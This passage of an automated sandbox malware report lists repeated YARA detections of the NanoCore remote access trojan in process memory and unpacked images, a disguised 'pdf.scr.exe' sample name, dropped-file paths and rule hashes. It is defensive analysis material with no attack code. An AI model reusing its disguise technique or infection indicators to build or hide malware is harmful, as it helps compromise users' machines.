      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: initial sample | Static PE information: Filename: 004349256789197.pdf.scr.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003D848E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003E6CDC
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003E00B7
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003E4088
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003D40FE
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003E7153
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003F51C9
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003D32F7
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003E62CA
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003E43BF
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003DC426
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003DF461
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003FD440
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003E77EF
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003D286B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003FD8EE
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003DE9B7
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_004019F4
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003E3E0B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003F4F9A
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003DEFE2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BBE0BE
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BC8037
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BC2007
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BAE1A0
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BDA28E
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BC22C2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BA225D
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BBC59E
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C2C7A3
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BDE89F
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C1291A
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BD6AFB
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C08B27
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BCCE30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C351D2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BD7169
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BA9240
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BA9499
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Section loaded: dxgidebug.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sfc.dll
      Source: 004349256789197.pdf.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
